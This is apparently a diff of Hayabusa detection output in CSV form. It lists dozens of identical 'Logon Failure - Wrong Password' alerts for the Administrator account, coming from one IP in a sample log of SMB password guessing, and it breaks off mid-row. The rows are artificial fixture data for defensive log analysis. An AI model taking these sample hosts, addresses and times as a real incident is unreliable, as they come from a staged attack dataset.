+2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 